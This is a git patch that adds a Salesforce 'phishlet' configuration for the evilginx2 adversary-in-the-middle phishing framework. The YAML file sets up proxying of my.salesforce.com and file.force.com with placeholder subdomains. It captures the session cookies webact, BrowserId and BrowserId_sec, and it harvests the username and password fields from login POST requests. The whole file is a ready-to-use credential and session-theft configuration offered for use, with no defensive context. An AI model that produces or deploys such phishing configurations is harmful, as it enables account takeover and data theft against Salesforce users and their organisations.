From 6a5e7255b72d1bf23a0c956acda6421163b9f02d Mon Sep 17 00:00:00 2001
From: JRodriguez556 <37945660+JRodriguez556@users.noreply.github.com>
Date: Thu, 16 Mar 2023 14:10:34 -0400
Subject: [PATCH] Add files via upload

---
 evilginx2/phishlets/salesforce.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 evilginx2/phishlets/salesforce.yaml

diff --git a/evilginx2/phishlets/salesforce.yaml b/evilginx2/phishlets/salesforce.yaml
new file mode 100644
index 00000000..34a818fc
--- /dev/null
+++ b/evilginx2/phishlets/salesforce.yaml
@@ -0,0 +1,24 @@
+author: '@JRodriguez556'
+min_ver: '2.3.0'
+proxy_hosts:
+  - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'my.salesforce.com', session: true, is_landing: true}
+  - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'file.force.com', session: true, is_landing: false}
+  
+sub_filters:
+  - {triggers_on: 'EXAMPLE.my.salesforce.com', orig_sub: 'EXAMPLE', domain: 'my.salesforce.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
+  - {triggers_on: 'EXAMPLE.my.salesforce.com', orig_sub: 'EXAMPLE', domain: 'my.salesforce.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
+auth_tokens:
+  - domain: 'salesforce.com'
+    keys: ['webact' , 'BrowserId' , 'BrowserId_sec']
+credentials:
+  username:
+    key: 'username'
+    search: '(.*)'
+    type: 'post'
+  password:
+    key: 'pw'
+    search: '(.*)'
+    type: 'post'
+login:
+  domain: 'EXAMPLE.my.salesforce.com'
+  path: '/secur/contentDoor'
\ No newline at end of file